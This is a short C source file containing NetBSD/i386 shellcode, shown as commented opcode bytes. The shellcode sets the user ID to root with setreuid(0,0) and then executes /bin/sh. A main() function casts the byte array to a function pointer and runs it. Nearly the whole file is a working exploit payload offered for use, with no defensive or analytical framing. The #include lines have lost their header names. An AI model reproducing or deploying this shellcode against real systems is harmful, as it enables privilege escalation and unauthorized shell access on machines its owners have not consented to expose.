/* * minervini at neuralnoise dot com (c) 2005 * NetBSD/i386 2.0, setreuid(0, 0); execve("/bin//sh", ..., NULL); * note: unsafe shellcode, but 29 bytes long; * doesn't work if (eax & 0x40000000) != 0; */ #include #include #include char scode[] = "\x99" // cltd "\x52" // push %edx "\x52" // push %edx "\x52" // push %edx "\x6a\x7e" // push $0x7e "\x58" // pop %eax "\xcd\x80" // int $0x80 "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x54" // push %esp "\x53" // push %ebx "\x52" // push %edx "\x34\x3b" // xor $0x3b,%al "\xcd\x80"; // int $0x80 int main() { void (*code) () = (void *) scode; printf("length: %d\n", strlen(scode)); code(); return (0); }